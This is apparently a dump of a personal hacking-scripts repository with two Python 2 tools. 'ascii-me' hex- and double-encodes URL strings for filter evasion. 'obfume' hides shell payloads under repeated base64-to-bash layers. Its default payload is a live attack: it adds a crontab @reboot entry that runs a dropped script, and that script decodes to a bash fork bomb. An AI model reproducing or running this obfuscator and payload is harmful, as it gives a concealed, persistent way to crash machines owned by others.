defaultdict 13 | import re 14 | from urllib import unquote 15 | 16 | ## Launcher options 17 | parser = argparse.ArgumentParser(description='On-the-fly HEX and ASCII URL converter', prog='ascii-me', usage='%(prog)s [alpha char lower num upper]') 18 | parser.add_argument('-d', action='store_true', help='Decodes HEX to ASCII' ) 19 | parser.add_argument('dict_choice', metavar='Dictionary Types:', type=str, nargs='*', help="'alpha', 'char', 'lower', 'num', 'upper'")#, choices = ['alpha', 'char', 'lower', 'num', 'upper']) 20 | args = parser.parse_args() 21 | 22 | def menu(): 23 | print "On-the-fly HEX and ASCII URL converter" 24 | print "" 25 | print "Available Options:" 26 | print " HEX encoding: alpha, char, lower, num, upper" 27 | print " HEX decoding: -d" 28 | print "" 29 | print "optional arguments:" 30 | print " -h, --help show the help message and exits" 31 | exit(1) 32 | 33 | ## argparse workarounds 34 | if args.dict_choice and args.d: 35 | menu() 36 | 37 | if args.d: 38 | ## Ask for URL 39 | url = raw_input("String to encode> ") 40 | print "Decoded URL is: ", unquote(url) 41 | exit(0) 42 | 43 | if not args.dict_choice and not args.d: 44 | menu() 45 | 46 | if None in args.dict_choice: 47 | menu() 48 | 49 | if 'alpha' in args.dict_choice or 'char' in args.dict_choice or 'lower' in args.dict_choice or 'num' in args.dict_choice or 'upper' in args.dict_choice: 50 | pass 51 | else: 52 | menu() 53 | 54 | ## Ask for URL 55 | url = raw_input("String to encode> ") 56 | 57 | ## Create dictionaries 58 | d_alpha = {'a': '%61', 'b': '%62', 'c': '%63', 'd': '%64', 'e': '%65', 'f': '%66', 'g': '%67', 'h': '%68', 'i': '%69', 'j': '%6A', 'k': '%6B', 'l': '%6C', 'm': '%6D', 'n': '%6E', 'o': '%6F', 'p': '%70', 'q': '%71', 'r': '%72', 's': '%73', 't': '%74', 'u': '%75', 'v': '%76', 'w': '%77', 'x': '%78', 'y': '%79', 'z': '%7A', 'A': '%41', 'B': '%42', 'C': '%43', 'D': '%44', 'E': '%45', 'F': '%46', 'G': '%47', 'H': '%48', 'I': '%49', 'J': '%4A', 'K': '%4B', 'L': '%4C', 'M': '%4D', 'N': '%4E', 'O': '%4F', 'P': '%50', 'Q': '%51', 'R': '%52', 'S': '%53', 'T': '%54', 'U': '%55', 'V': '%56', 'W': '%57', 'X': '%58', 'Y': '%59', 'Z': '%5A'} 59 | 60 | d_char = {' ': '%20', '!': '%21', '"': '%22', '#': '%23', '$': '%24', '%': '%25', '&': '%26', "'": '%27', '(': '%28', ')': '%29', '*': '%2A', '+': '%2B', ',': '%2C', '-': '%2D', '.': '%2E', '/': '%2F', ':': '%3A', ';': '%3B', '<': '%3C', '=': '%3D', '>': '%3E', '?': '%3F', '@': '%40', '[': '%5B', '\\': '%5C', ']': '%5D', '^': '%5E', '_': '%5F', '`': '%60', '{': '%7B', '|': '%7C', '}': '%7D', '~': '%7E'} 61 | 62 | d_lower = {'a': '%61', 'b': '%62', 'c': '%63', 'd': '%64', 'e': '%65', 'f': '%66', 'g': '%67', 'h': '%68', 'i': '%69', 'j': '%6A', 'k': '%6B', 'l': '%6C', 'm': '%6D', 'n': '%6E', 'o': '%6F', 'p': '%70', 'q': '%71', 'r': '%72', 's': '%73', 't': '%74', 'u': '%75', 'v': '%76', 'w': '%77', 'x': '%78', 'y': '%79', 'z': '%7A'} 63 | 64 | d_num = {'0': '%30', '1': '%31', '2': '%32', '3': '%33', '4': '%34', '5': '%35', '6': '%36', '7': '%37', '8': '%38', '9': '%39'} 65 | 66 | d_upper = {'A': '%41', 'B': '%42', 'C': '%43', 'D': '%44', 'E': '%45', 'F': '%46', 'G': '%47', 'H': '%48', 'I': '%49', 'J': '%4A', 'K': '%4B', 'L': '%4C', 'M': '%4D', 'N': '%4E', 'O': '%4F', 'P': '%50', 'Q': '%51', 'R': '%52', 'S': '%53', 'T': '%54', 'U': '%55', 'V': '%56', 'W': '%57', 'X': '%58', 'Y': '%59', 'Z': '%5A'} 67 | 68 | ## Convert user choice over to a dictionary 69 | user_selection = {'alpha': d_alpha, 'num': d_num, 'lower': d_lower, 'upper': d_upper, 'char': d_char} 70 | 71 | ## Take url and make a list out of it 72 | l_url = list(url) 73 | 74 | ## Create the encoded lists 75 | encode = [] 76 | double = [] 77 | 78 | ## Create list of the arguments 79 | ###print "" 80 | ###print "Our work so far:" 81 | ###print args.dict_choice 82 | ###print "" 83 | list_of_dicts = list(args.dict_choice) 84 | 85 | ## Merge called dictionaries into one: 86 | user_dict={} 87 | for i in list_of_dicts: 88 | merge = user_selection.get(i) 89 | user_dict.update(merge) 90 | ###print user_dict 91 | 92 | ## Iterate through the list and perform the encoding 93 | for i in l_url: 94 | val = user_dict.get(i, i) 95 | ### print val 96 | ### print "Adding %s to the list." % i 97 | encode.append(val) 98 | 99 | ## Iterate through the list and perform the double encoding 100 | for i in l_url: 101 | val = user_dict.get(i, i) 102 | if "%" in val: 103 | val = val.replace('%', '') 104 | ### print val 105 | ### print "Adding %s to the list." % i 106 | val = '%25' + str(val) 107 | 108 | double.append(val) 109 | 110 | ## Show the newly encoded URL 111 | final_string = ''.join(encode) 112 | double_string = ''.join(double) 113 | print "Encoded URL is: ", final_string 114 | print "Double URL is: ", double_string 115 | 116 | 117 | ##~~~~~~~~~~~~~~~~~~~~~~~~~ File and License Info ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## 118 | ## Filename: ascii-me 119 | ## Version: 0.4 120 | ## Copyright (C) <2015> 121 | 122 | ## This program is free software: you can redistribute it and/or modify 123 | ## it under the terms of the GNU General Public License as published by 124 | ## the Free Software Foundation, either version 3 of the License, or 125 | ## (at your option) any later version. 126 | 127 | ## This program is distributed in the hope that it will be useful, 128 | ## but WITHOUT ANY WARRANTY; without even the implied warranty of 129 | ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 130 | ## GNU General Public License for more details. 131 | 132 | ## You should have received a copy of the GNU General Public License 133 | ## along with this program. If not, see . 134 | ##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## 135 | 136 | 137 | ##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ To Do ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## 138 | ## Incorporate exclusions 139 | ##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## 140 | 141 | 142 | ##~~~~~~~~~~~~~~~~~~~~~~~~~~~ Development Notes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## 143 | ## Debate on using decaff ideas 144 | ## d_lower = {chr(x): hex(x).replace('0x', '%').upper() for x in range(97, 123)} 145 | ## Dictionary combinining 3.5 style 146 | ## special_char = {**special_char1, **special_char2, **special_char3, **special_char4} 147 | ## Translation ideas 148 | ## encode = url.translate(str.maketrans(choice)) 149 | ## double_encode = url.translate(str.maketrans({key: ('%25' + val.replace('%', '')) for key, val in choice.items()})) 150 | ##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## 151 | 152 | 153 | ##~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits and Kudos ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## 154 | ## First and foremost, to God above for giving me the abilities I have, Amen. 155 | 156 | ## The "Community" for always working towards improving the existing..... 157 | 158 | ## Kudos to my wife for always standing by my side, having faith in me, and showing the greatest of patience for my obsession with hacking. 159 | 160 | ## Special thanks goes out to: 161 | ## h4llig4n and decaff for helping me out with the double encoding aspect 162 | 163 | ## decaff for helping me with variablizing dictionary choices 164 | 165 | ## Jack64 for helping me with iterative logic 166 | ##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~## 167 | -------------------------------------------------------------------------------- /strings/b64.sh: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/stryngs/scripts/851697a4aa5332e2b606221b088f25a3d86c35eb/strings/b64.sh -------------------------------------------------------------------------------- /strings/obfume: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | ## Filename: obfume 4 | ## Author: Jack64, stryngs 5 | ## Concept: Obfuscate a payload 6 | 7 | import base64 8 | 9 | def b64_iter(payload): 10 | command = "echo " 11 | command += base64.b64encode(payload) 12 | command += " | base64 -d | bash" 13 | return command 14 | 15 | 16 | def default_payload(): 17 | return '''crontab -l > .k; echo "@reboot /bin/bash $(pwd)/fu" >> .k; crontab < .k; rm .k; echo "echo OigpeyA6fDomIH07Ogo= | base64 -d | bash" > $(pwd)/fu;chmod 0755 fu;''' 18 | 19 | def main(): 20 | payload = raw_input('Desired Payload? [Default]\n') 21 | if not payload: 22 | payload = default_payload() 23 | itr = int(raw_input('Desired Iterations?\n')) 24 | output = obfs_bash_b64_iter(payload, itr) 25 | with open('obs.txt', 'wb') as oFile: 26 | oFile.write(output + '\n') 27 | print 'Output file is obs.txt!' 28 | 29 | def obfs_bash_b64_iter(payload,n): 30 | i = 0 31 | cnt = 1 32 | command = payload 33 | while (i < n): 34 | c2 = b64_iter(command) 35 | command = c2 36 | i += 1 37 | print 'Iteration: ', cnt 38 | cnt += 1 39 | return command 40 | 41 | if __name__ == '__main__': 42 | main() 43 | --------------------------------------------------------------------------------